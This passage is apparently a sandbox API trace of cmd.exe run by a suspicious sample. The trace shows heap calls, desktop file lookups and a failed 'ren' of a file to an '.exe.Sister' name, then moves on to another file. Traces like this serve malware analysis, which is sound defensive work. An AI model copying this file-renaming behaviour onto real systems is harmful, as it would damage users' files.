MemoryPointer=0x21ed956f1d0) returned 0x30 [0187.674] GetProcessHeap () returned 0x21ed8c70000 [0187.674] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956f210 [0187.674] malloc (_Size=0x1ff9c) returned 0x21ed96bfe00 [0187.676] GetProcessHeap () returned 0x21ed8c70000 [0187.676] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937d150 [0187.676] GetProcessHeap () returned 0x21ed8c70000 [0187.676] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937dbd0 [0187.677] ??_V@YAXPEAX@Z () returned 0x1 [0187.677] malloc (_Size=0x1ff9c) returned 0x21ed96bfe00 [0187.677] GetProcessHeap () returned 0x21ed8c70000 [0187.677] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937d990 [0187.677] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed96bfe00, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0187.677] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937c410, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d64b60 [0187.677] FindClose (in: hFindFile=0x21ed8d64b60 | out: hFindFile=0x21ed8d64b60) returned 1 [0187.677] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937c410, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d64b60 [0187.678] FindClose (in: hFindFile=0x21ed8d64b60 | out: hFindFile=0x21ed8d64b60) returned 1 [0187.678] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9a71ec76, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x9a71ec76, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937c410, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d652e0 [0187.678] FindClose (in: hFindFile=0x21ed8d652e0 | out: hFindFile=0x21ed8d652e0) returned 1 [0187.678] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9a71ec76, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x9a71ec76, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937c410, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0187.678] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0187.679] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0187.680] GetProcessHeap () returned 0x21ed8c70000 [0187.680] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d66eb0 [0187.680] ??_V@YAXPEAX@Z () returned 0x1 [0187.680] ??_V@YAXPEAX@Z () returned 0x1 [0187.680] GetProcessHeap () returned 0x21ed8c70000 [0187.680] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956f210, Size=0x490) returned 0x21ed956f210 [0187.680] GetProcessHeap () returned 0x21ed8c70000 [0187.680] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956f210) returned 0x490 [0187.680] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0187.680] _get_osfhandle (_FileHandle=1) returned 0x50 [0187.680] GetFileType (hFile=0x50) returned 0x2 [0187.680] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0187.680] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0187.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0187.777] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0187.885] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0187.885] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0187.885] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0187.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0187.885] GetFileType (hFile=0x50) returned 0x2 [0187.885] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0187.886] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0187.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0187.981] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0188.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0188.065] GetFileType (hFile=0x50) returned 0x2 [0188.065] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0188.065] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0188.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0188.239] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed956f1e0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed956f1e0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0188.320] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0188.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0188.320] GetFileType (hFile=0x50) returned 0x2 [0188.320] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0188.320] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0188.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0188.390] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0188.469] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0188.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0188.469] GetFileType (hFile=0x50) returned 0x2 [0188.469] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0188.469] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0188.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0188.540] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0188.618] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0188.794] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0188.795] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0188.796] malloc (_Size=0xffce) returned 0x21ed96bfe00 [0188.796] ??_V@YAXPEAX@Z () returned 0x21ed96bfe00 [0188.796] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0188.796] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0188.796] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0188.796] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0188.796] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0188.796] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0188.796] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0188.796] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0188.796] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0188.797] ??_V@YAXPEAX@Z () returned 0x1 [0188.797] GetProcessHeap () returned 0x21ed8c70000 [0188.797] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d6c5c0 [0188.797] GetProcessHeap () returned 0x21ed8c70000 [0188.797] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c5c0, Size=0x130) returned 0x21ed8d6c5c0 [0188.797] GetProcessHeap () returned 0x21ed8c70000 [0188.797] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6c5c0) returned 0x130 [0188.797] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0188.797] malloc (_Size=0xffce) returned 0x21ed96bfe00 [0188.797] ??_V@YAXPEAX@Z () returned 0x21ed96bfe00 [0188.797] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0188.797] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed96bfe00, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0188.799] ??_V@YAXPEAX@Z () returned 0x1 [0188.799] GetProcessHeap () returned 0x21ed8c70000 [0188.799] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d6b430 [0188.800] GetProcessHeap () returned 0x21ed8c70000 [0188.800] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d6c700 [0188.800] GetProcessHeap () returned 0x21ed8c70000 [0188.800] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c700, Size=0x130) returned 0x21ed8d6c700 [0188.800] GetProcessHeap () returned 0x21ed8c70000 [0188.800] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6c700) returned 0x130 [0188.800] malloc (_Size=0xffce) returned 0x21ed96bfe00 [0188.800] ??_V@YAXPEAX@Z () returned 0x21ed96bfe00 [0188.800] GetProcessHeap () returned 0x21ed8c70000 [0188.800] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d652e0 [0188.800] GetProcessHeap () returned 0x21ed8c70000 [0188.800] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955aab0 [0188.800] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0188.800] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0188.800] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0188.800] GetLastError () returned 0x2 [0188.800] GetProcessHeap () returned 0x21ed8c70000 [0188.800] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed99c0040 [0188.800] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed99c0050 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0188.801] SetErrorMode (uMode=0x0) returned 0x0 [0188.801] SetErrorMode (uMode=0x1) returned 0x0 [0188.801] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed96bfe00, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0188.801] SetErrorMode (uMode=0x0) returned 0x1 [0188.801] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0188.801] GetProcessHeap () returned 0x21ed8c70000 [0188.801] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955be30 [0188.801] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0188.801] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0188.801] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0188.801] GetLastError () returned 0x2 [0188.802] ??_V@YAXPEAX@Z () returned 0x1 [0188.802] malloc (_Size=0xffce) returned 0x21ed96bfe00 [0188.802] ??_V@YAXPEAX@Z () returned 0x21ed96bfe00 [0188.802] malloc (_Size=0xffce) returned 0x21ed96cfde0 [0188.802] ??_V@YAXPEAX@Z () returned 0x21ed96cfde0 [0188.802] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0188.802] GetLastError () returned 0x2 [0188.802] _get_osfhandle (_FileHandle=2) returned 0x54 [0188.802] GetFileType (hFile=0x54) returned 0x2 [0188.802] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0188.802] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0188.892] _get_osfhandle (_FileHandle=2) returned 0x54 [0188.892] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0188.973] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0188.973] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0188.973] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0189.326] longjmp () [0189.326] ??_V@YAXPEAX@Z () returned 0x1 [0189.326] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a867490, ftCreationTime.dwHighDateTime=0x1d5e872, ftLastAccessTime.dwLowDateTime=0x264895d0, ftLastAccessTime.dwHighDateTime=0x1d5e870, ftLastWriteTime.dwLowDateTime=0x264895d0, ftLastWriteTime.dwHighDateTime=0x1d5e870, nFileSizeHigh=0x0, nFileSizeLow=0x12425, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="WDqhYWbTT.csv", cAlternateFileName="")) returned 1 [0189.326] GetProcessHeap () returned 0x21ed8c70000 [0189.326] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c130, Size=0x496) returned 0x21ed8d6c840 [0189.327] GetProcessHeap () returned 0x21ed8c70000 [0189.327] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6c840) returned 0x496 [0189.327] GetProcessHeap () returned 0x21ed8c70000 [0189.327] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956f6b0 [0189.327] GetProcessHeap () returned 0x21ed8c70000 [0189.327] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956f6b0, Size=0x30) returned 0x21ed956f6b0 [0189.327] GetProcessHeap () returned 0x21ed8c70000 [0189.327] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956f6b0) returned 0x30 [0189.327] GetProcessHeap () returned 0x21ed8c70000 [0189.327] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956f6f0 [0189.327] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0189.329] GetProcessHeap () returned 0x21ed8c70000 [0189.330] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2c) returned 0x21ed937b0b0 [0189.330] ??_V@YAXPEAX@Z () returned 0x1 [0189.330] GetProcessHeap () returned 0x21ed8c70000 [0189.330] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956f6f0, Size=0x150) returned 0x21ed956f6f0 [0189.330] GetProcessHeap () returned 0x21ed8c70000 [0189.330] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956f6f0) returned 0x150 [0189.330] GetProcessHeap () returned 0x21ed8c70000 [0189.330] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956f850 [0189.330] GetProcessHeap () returned 0x21ed8c70000 [0189.330] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956f850, Size=0x290) returned 0x21ed956f850 [0189.330] GetProcessHeap () returned 0x21ed8c70000 [0189.330] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956f850) returned 0x290 [0189.330] GetProcessHeap () returned 0x21ed8c70000 [0189.330] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956faf0 [0189.330] GetProcessHeap () returned 0x21ed8c70000 [0189.330] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956faf0, Size=0x30) returned 0x21ed956faf0 [0189.330] GetProcessHeap () returned 0x21ed8c70000 [0189.330] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956faf0) returned 0x30 [0189.330] GetProcessHeap () returned 0x21ed8c70000 [0189.330] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956fb30 [0189.330] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0189.330] GetProcessHeap () returned 0x21ed8c70000 [0189.330] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2c) returned 0x21ed937aa70 [0189.331] ??_V@YAXPEAX@Z () returned 0x1 [0189.331] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0189.331] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d64b60 [0189.331] FindClose (in: hFindFile=0x21ed8d64b60 | out: hFindFile=0x21ed8d64b60) returned 1 [0189.331] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d64b60 [0189.331] FindClose (in: hFindFile=0x21ed8d64b60 | out: hFindFile=0x21ed8d64b60) returned 1 [0189.332] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9a71ec76, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x9a71ec76, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d64b60 [0189.332] FindClose (in: hFindFile=0x21ed8d64b60 | out: hFindFile=0x21ed8d64b60) returned 1 [0189.332] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WDqhYWbTT.csv", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a867490, ftCreationTime.dwHighDateTime=0x1d5e872, ftLastAccessTime.dwLowDateTime=0x264895d0, ftLastAccessTime.dwHighDateTime=0x1d5e870, ftLastWriteTime.dwLowDateTime=0x264895d0, ftLastWriteTime.dwHighDateTime=0x1d5e870, nFileSizeHigh=0x0, nFileSizeLow=0x12425, dwReserved0=0x4, dwReserved1=0x80, cFileName="WDqhYWbTT.csv", cAlternateFileName="WDQHYW~1.CSV")) returned 0x21ed8d64b60 [0189.332] FindClose (in: hFindFile=0x21ed8d64b60 | out: hFindFile=0x21ed8d64b60) returned 1 [0189.332] _wcsnicmp (_String1="WDQHYW~1.CSV", _String2="WDqhYWbTT.csv", _MaxCount=0xd) returned 28 [0189.332] malloc (_Size=0x1ff9c) returned 0x21ed96dfdc0 [0189.333] ??_V@YAXPEAX@Z () returned 0x21ed96dfdc0 [0189.334] GetProcessHeap () returned 0x21ed8c70000 [0189.334] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45e00 [0189.334] ??_V@YAXPEAX@Z () returned 0x1 [0189.334] ??_V@YAXPEAX@Z () returned 0x1 [0189.334] GetProcessHeap () returned 0x21ed8c70000 [0189.335] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956fb30, Size=0x150) returned 0x21ed956fb30 [0189.335] GetProcessHeap () returned 0x21ed8c70000 [0189.335] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956fb30) returned 0x150 [0189.335] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0189.335] _get_osfhandle (_FileHandle=1) returned 0x50 [0189.335] GetFileType (hFile=0x50) returned 0x2 [0189.335] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0189.335] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0189.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0189.412] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0189.491] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0189.491] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0189.491] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0189.491] _get_osfhandle (_FileHandle=1) returned 0x50 [0189.491] GetFileType (hFile=0x50) returned 0x2 [0189.492] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0189.492] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0189.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0189.564] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0189.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0189.644] GetFileType (hFile=0x50) returned 0x2 [0189.644] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0189.644] GetConsoleMode (in: hConsoleHandle=0x50, 